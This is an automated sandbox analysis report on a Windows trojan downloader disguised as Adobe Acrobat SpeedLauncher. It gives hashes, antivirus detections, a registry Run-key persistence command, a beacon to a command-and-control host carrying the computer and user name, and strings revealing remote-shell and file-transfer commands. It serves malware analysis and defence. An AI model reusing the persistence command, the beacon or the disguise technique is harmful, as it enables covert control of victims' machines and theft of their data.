Analysis Date2014-01-03 10:56:12
MD555fb1409170c91740359d1d96364f17b
SHA1eaf87e11c34f84932c567b85f2f004263e737e14

Static Details:

File typePE32 executable for MS Windows (GUI) Intel 80386 32-bit
Section.text md5: 0fe9ed26ee8dac2ad66f17fe931e5cc4 sha1: 569a2df945e22f828a868388e0623aafe89122f7 size: 9728
Section.rdata md5: 7df1e22dadbdcf85ea4f531e5aa7147e sha1: 82afd757494f7bf09292f2f0e6cda5e20e72580f size: 3072
Section.data md5: 31d8808b923f3666213f87e82ea54529 sha1: 8baec1b4cb90f65617a4788201e533365fd17df5 size: 2560
Section.rsrc md5: 9721dcc7e94f7acf151c715cd34476f4 sha1: 824b27c0ee844c7b06592beed30ac3c561db1cf3 size: 1024
Timestamp2009-02-05 07:14:01
VersionLegalCopyright: Copyright Adobe Systems Incorporated 2004
FileVersion: 8, 0, 0, 0
CompanyName: Adobe Systems Incorporated
Comments:
ProductName: Adobe Acrobat
ProductVersion: 8, 0, 0, 0
FileDescription: Adobe Acrobat SpeedLauncher
OriginalFilename: AcroSpeedLaunch.exe
PackerMicrosoft Visual C++ v6.0
PEhash831bc4c3083b9d8f9e79455c8460b649f12c5905
AVmcafeeDownloader.a!bkg
AVavgGeneric14.HE
AVclamavTrojan.Downloader-74679

Runtime Details:

Screenshot

Process
↳ C:\malware.exe

Creates FileC:\Documents and Settings\Administrator\Application Data\Adobe\reader_sl.exe
Creates Processreg.exe add HKCU\Software\Microsoft\Windows\CurrentVersion\Run /v Adobe Reader Speed Launcher /d C:\Documents and Settings\Administrator\Application Data\Adobe\reader_sl.exe /f
Creates MutexGLOBAL\ADR32
Winsock URLhttp://news.canadatvsite.com/worlda.html

Process
↳ reg.exe add HKCU\Software\Microsoft\Windows\CurrentVersion\Run /v Adobe Reader Speed Launcher /d C:\Documents and Settings\Administrator\Application Data\Adobe\reader_sl.exe /f

RegistryHKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run\Adobe Reader Speed Launcher ➝
C:\Documents and Settings\Administrator\Application Data\Adobe\reader_sl.exe\\x00

Network Details:

DNSnews.canadatvsite.com
Type: A
50.116.42.33
HTTP GEThttp://news.canadatvsite.com/worlda.html
User-Agent: 5.1 01:09 COMPUTER-XXXXXX\Administrator
Flows TCP192.168.1.1:1031 ➝ 50.116.42.33:80

Raw Pcap
0x00000000 (00000)   47455420 2f776f72 6c64612e 68746d6c   GET /worlda.html
0x00000010 (00016)   20485454 502f312e 310d0a55 7365722d    HTTP/1.1..User-
0x00000020 (00032)   4167656e 743a2035 2e312030 313a3039   Agent: 5.1 01:09
0x00000030 (00048)   20434f4d 50555445 522d5858 58585858    COMPUTER-XXXXXX
0x00000040 (00064)   5c41646d 696e6973 74726174 6f720d0a   \Administrator..
0x00000050 (00080)   486f7374 3a206e65 77732e63 616e6164   Host: news.canad
0x00000060 (00096)   61747673 6974652e 636f6d0d 0a436163   atvsite.com..Cac
0x00000070 (00112)   68652d43 6f6e7472 6f6c3a20 6e6f2d63   he-Control: no-c
0x00000080 (00128)   61636865 0d0a0d0a                     ache....


Strings
040904e4
8, 0, 0, 0
AcroSpeedLaunch.exe
Adobe Acrobat
Adobe Acrobat SpeedLauncher
Adobe Systems Incorporated
Comments
CompanyName
Copyright Adobe Systems Incorporated 2004
FileDescription
FileVersion
LegalCopyright
OriginalFilename
ProductName
ProductVersion
StringFileInfo
Translation
VarFileInfo
VS_VERSION_INFO
090205
%-24s %s
%-26s %5d
??2@YAPAXI@Z
??3@YAXPAX@Z
Accept:*/*
_acmdln
add "HKCU\%s" /v "%s" /d "%s" /f
_adjust_fdiv
Adobe Reader Speed Launcher
ADVAPI32.dll
AllocConsole
 and the PID is %d
\Application Data\Adobe\reader_sl.exe
border=
Cache-Control:max-age=0
Cache-Control:no-cache
CD-ROM		
CloseHandle
CloseServiceHandle
\cmd.exe
CmdPath=
Computer:
%ComSpec%
CONIN$
Content-Length: %d
_controlfp
ControlService
ControlService failed!
CopyFileA
CreateDirectoryA
Create failed with %d!
CreateFileA
CreateMutexA
CreatePipe
CreateProcessA
CreateProcessAsUserA
CreateProcess failed!
CreateThread
CreateToolhelp32Snapshot
__CxxFrameHandler
@.data
%d.%d %02d:%02d %s\%s
_EH_prolog
EnumServicesStatusExA
_except_handler3
ExitProcess
ExpandEnvironmentStringsA
Failed!
FileSize:	%d
Fixed		
GetComputerNameA
GetConsoleDisplayMode
GetCurrentProcess
GetDriveTypeA
GetExitCodeProcess
GetFileAttributesA
GetFileAttributes Error code: %d
GetFileSize
GetLastError
GetLocalTime
GetLogicalDrives
__getmainargs
GetModuleFileNameA
GetModuleHandleA
GetStartupInfoA
GetSystemDirectoryA
geturl
GetUserNameA
GetUserNameExA
GetUserProfileDirectoryA
GetVersionExA
GetVolumeInformationA
GetWindowsDirectoryA
GLOBAL\ADR32
<h1>Bad Request (Invalid Hostname)</h1>
HttpAddRequestHeadersA
HttpOpenRequestA
HttpSendRequestA
IE 8.5
_initterm
InternetCloseHandle
InternetConnectA
InternetOpenA
InternetOpenUrlA
InternetQueryOptionA
InternetReadFile
InternetSetOptionA
Invalid		
KERNEL32.dll
list process failed!
list service failed!
lstrcatA
lstrlenA
memcpy
memset
Mozilla/5.0
~MS80547.bat
MSVCRT.dll
OpenP failed with %d!
OpenProcess
OpenProcessToken
OpenSCManagerA
OpenSCManager failed!
OpenServiceA
OpenService failed!
OpenT failed with %d!
__p__commode
PeekNamedPipe
__p__fmode
pidrun
Pragma:no-cache
Process32First
Process32Next
Process cmd.exe exited!
Program started!
Proxy-Connection:Keep-Alive
PVVj VV
PVVVWV
PVVVWVV
Ramdisk		
`.rdata
ReadFile
RegCloseKey
RegCreateKeyExA
RegDeleteValueA
reg.exe
Remote		
Removeable		
%*[^/]%*[/]%*[^/]%s
%s Connected!
Secur32.dll
Service does not exist!
Service doesn't start!
Service is running already!
Service started!
Service still running!
Service stopped!
Service stop pending!
__set_app_type
SetCurrentDirectoryA
SetStdHandle
__setusermatherr
SHELL32.dll
ShellExecuteA
Shell started fail!
Shell started successfully!
Shell started,wait to terminate it.....
Sleep Time:
Software\Microsoft\Windows\CurrentVersion\Run
So long!
sprintf
sscanf
SSSh<W@
SSSVSS
Started already,
StartServiceA
StartService failed!
Start shell first.
strcat
strchr
_strcmpi
strcpy
strlen
_strnicmp
strrchr
strstr
Syntax error!
Syntax error!	Usage:	getf/putf FileName <N>
Syntax error!	Usage:	GetUrl URL FileName
Syntax error!	Usage:	kill </p|/s> <pid|ServiceName>
Syntax error!	Usage:	list </p|/s|/d>
Syntax error!	Usage:	start </p|/s> <filename|ServiceName>
t0V<#u
t4j SV3
\tasks
TerminateProcess
!This program cannot be run in DOS mode.
t<Ht2Ht(Ht
t:h(U@
Totally %d volumes found.
Unkown		
URLDownloadToFileA
urlmon.dll
USERENV.dll
Volume on this computer:
Volume	Type		Volume Name
W95hX@
WaitForSingleObject
whoami
width=
WININET.dll
WPh@R@
WriteConsoleInputA
WriteFile
_XcptFilter
Yt7@PV
YtEj/U
YYSSSSS
YYSSSVSS
YYSSVUS
YYt5j\
YYWWVh50@
YYWWVhp/@
ZbRich